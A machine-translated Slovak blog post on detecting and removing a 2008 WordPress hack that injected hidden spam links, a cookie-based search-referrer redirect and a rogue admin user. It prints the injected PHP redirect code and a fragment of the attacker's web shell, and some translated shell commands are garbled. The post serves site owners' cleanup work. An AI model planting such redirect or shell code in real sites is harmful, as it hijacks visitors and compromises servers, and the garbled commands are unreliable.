Vírusová blogosféra ... ale čo ste mali so mnou?!

V poslednom mesiaci, som dostal varovanie vírus v blogu z niektorých návštevníkov. Pôvodne som ignoroval varovanie, pretože som nainštaloval docela dobrý antivírusový program (Kaspersky AV 2009) A aj blog na dlhú dobu, nikdy som dostal vírus alert (dávno .. Videl som niečo podozrivého, že prvý obnovovací zmizol. Konečne ...).
Pomaly začali prejavovať veľké rozdiely návštevnostiPo ktorá nedávno plynule znížila návštevnosť a začal byť stále viac a viac ľudí mi povedať, že stealthsettings. S to je nakazené vírusmi. Včera som dostal od niekoho screenshot urobiť, keď antivírus zablokovanie scenár z stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bolo to dosť presvedčivé na mňa, tak som dal všetky zdroje prehľadávané. Prvá myšlienka, ktorá ma napadla, bola k tomu upgrade posledný WordPress (2.5.1), ale nie skôr, než staré skript odstrániť všetky súbory WordPress a aby zálohovanie databázy. Tento postup nefungoval a pravdepodobne mi dlho trvalo, kým som zistil, kde sa chyba nachádza, ak mi to nepovedala. Eugen v diskusii nad kávou, našiel súvislosť Google a že by bolo dobré ho vidieť.
MyDigitalLife.info, uverejnil článok s názvom: „WordPress Hack: Recover a Fix Google a vyhľadávače, alebo žiadny súbor cookie prevádzku presmerovaný na Váš-Needs.info, AnyResults.Net, Golden-Info.net a ďalších nelegálnych stránok"To je koniec nite som potreboval.
Je to o využiť WordPress na základe súboru cookieČo myslím, že je veľmi zložité a urobil knihu. Natoľko šikovný, aby sa SQL Injection Databáza blog, vytvoriť neviditeľný užívateľa jednoduché rutinné kontrola Informačný panel->užívatelia, Skontrolujte server adresáre a súbory "nahrávacie" (S chmod 777), aby hľadal a vykonať Súbory s oprávneniami skupiny alebo koreň. Ja neviem, kto zneužiť meno a vidieť, že existuje len málo napísané články o ňom, a to napriek skutočnosti, že mnoho blogov sú infikované, vrátane Rumunska. Ok ... Budem sa snažiť, aby sa pokúsili vysvetliť univerzálnosti o vírusu.

Čo je to vírus?

Najprv vložte zdroje stránky na blogy, odkazy neviditeľné pre návštevníkov, ale viditeľný a doštičkové pre vyhľadávače, najmä Google. Takto prevod stránky Page Rank uvedené útočníkom. Po druhé je vložený ďalší Presmerovanie kód URL pre návštevníkov z Google, Live, Yahoo, ... alebo RSS čítačka a nie miesto v sušienka, antivírus detekuje presmerovanie as Trojan-Clicker.HTML.

Príznaky:

Znížená masívne návštevnostiNajmä na blogy, kde väčšina návštevníkov prichádza z Google.

Identifikácia: (Teda komplikovať problém pre tých, ktorí nevedia, ako, ako phpmyadmin, php a linux)

LA. VAROVANIE! Najprv vytvoriť záložnú databázu!

1. Skontrolujte zdrojové súbory index.php, header.php, footer.php, Téma tohto blogu a uvidíme, či tam je kód, ktorý používa šifrovanie base64 alebo obsahuje „if ($ ser ==“ 1? && sizeof ($ _ COOKIE) == 0) ”v tvare:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Alebo tak niečo. Zmazať tento kód!

Kliknite na obrázok ...

Kód index

Na snímke obrazovky vyššie som omylom vybral a „ „. Tento kód musí zostať.

2. Použitie phpMyAdmin a ísť do databázovej tabuľky wp_usersTam, kde kontrola nie je užívateľské meno vytvorené na 00:00:00 0000-00-00 (Možno v oblasti user_login napísať "WordPress". Poznámka: ID užívateľa (pole ID) a potom ho odstráňte.

Kliknite na obrázok ...

Fake užívateľa

* Zelená linka by mala byť odstránená, a udržal si ID. V prípade ospalýBol ID = 8 .

3. Prejsť na tabuľky wp_usermeta, Kde sa nachádza a utrieť linky pre ID (ak pole USER_ID ID hodnota je odstránený).

4. V tabuľke wp_optionChoď active_plugins a uvidíte, čo plugin je povolené podozrivého. To môže byť použitý ako zakončenie _old.giff, _old.pngg, _old.jpeg, _new.php.giffatď. kombinácie rozšírení rozšírených obrázkov o _old a _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Odstrániť tento doplnok, potom prejsť na blog -> Dashboard -> Pluginy, kde deaktivujete a aktivujete akýkoľvek doplnok.

Kliknite na obrázok pre zobrazenie je zdá active_plugins vírus súbor.

zapojiť

Sledujte cestu na FTP alebo SSH, je uvedené v active_plugins a zmazať súbor zo servera.

5. Aj v phpMyAdmin, v tabuľke wp_option, Nájsť a odstrániť riadok obsahujúci "rss_f541b3abd05e7962fcab37737f40fad8"A"internal_links_cache ".
V internal_links_cache, ponúkol šifrované spamu odkazy, ktoré sa zobrazujú v blogu Google Adsense kód, Hacker.

6. Odporúča sa, aby zmeniť heslo Blog a prihlásenie odobrať všetky podozrivé userele. Upgrade na najnovšiu verziu WordPress a nastavte blog neumožňuje registráciu nových užívateľov. Nedochádza k strate ... môžu komentovať a nelogické.

Vyššie som sa pokúsil trochu vysvetliť, čo robiť v takejto situácii, vyčistiť blog od tohto vírusu. Problém je oveľa vážnejší, ako sa zdá, a ani zďaleka nie je vyriešený, pretože sa používajú bezpečnostné zraniteľnosti hosting webový server, ktorý je blog.

Ako prvé opatrenie bezpečnosti, s prístupom SSH, Urobiť nejaké kontroly na serveri, či sú súbory ako * _old * a * _New. * S koncovkami.GIFF,. Jpeg,. Pngg,. Jpgg. Tieto súbory musia byť odstránené. Ak premenujete súbor, napríklad. top_right_old.giff in top_right_old.phpVidíme, že súbor je presne kód zneužitie servera.

Niekoľko užitočných pokynov na kontrolu, čistenie a zabezpečenie servera. (cez SSH)

1.  cd / tmp a skontrolujte, či sú k dispozícii adresáre ako tmpVFlma alebo iný kombinácia asemenatoare meno a odstrániť ju. Pozri obrázok nižšie, dve také zložky, ktoré sa mi:

tmpserver

rm-rf foldername

2. Skontrolujte elimiati (výmena chmod-mail) zložky s atribútmi ako je to možné chmod 777

nájsť všetky zapisovateľné files v aktuálnom adresári: Nájsť. -Type f-perm-2-ls
nájsť všetky zapisovateľné adresára v aktuálnej dir: Nájsť. -Type d-perm-2-ls
nájsť všetky zapisovateľné adresáre a files v aktuálnom adresári: Nájsť. -Perm-2-ls

3. Hľadáte podozrivých súborov na serveri.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, VAROVANIE! súbory, ktoré si stanovili trochu Suid si SGID. Tieto súbory spustiť s právami užívateľa (skupina), alebo koreň, nie užívateľ, ktorý spustiť súbor. Tieto súbory môžu viesť k koreňovej kompromisu, ak sa jeho bezpečnostné problémy. Ak nechcete používať suid a SGID súbory s trochou, vykonajte "chmod 0 " je, alebo odinštalovať balíček obsahujúci im.

Exploit obsahuje niekde v zdroji ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Zistí, že spôsob, ako ... v podstate narušenia bezpečnosti. Prístavy otvorte adresár "zápis" a skupinové spustenie výsady súborov / koreň.

Späť s viac ...

Niektoré infikované blogy: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... A zoznam pokračuje ... veľa.

To, či je blog infikovaný, môžete skontrolovať pomocou vyhľadávacieho nástroja Google. kopírovať vložiť:

Miesto: www.blegoo.com kúpiť

Dobrú noc a dobrú prácu;) Čoskoro si myslím, že Eugen príde so správami, na prevezibil.imprevizibil.com

BRB :)

TO: POZOR! WordPress tému zmeny alebo upgrade na WordPress 2.5.1, nie je riešením, ako sa zbaviť tohto vírusu.

Vášnivý k technológiám, rád testujem a píšem návody o operačných systémoch macOS, Linux, Windows, o konfigurácii webového servera WordPress, WooCommerce a LEMP (Linux, NGINX, MySQL a PHP). Píšem ďalej StealthSettings.com od roku 2006 a o pár rokov neskôr som začal písať na iHowTo.Tips návody a novinky o zariadeniach v ekosystéme Apple: iPhone, iPad, Apple Hodinky, HomePod, iMac, MacBook, AirPods a príslušenstvo.

Pridať komentár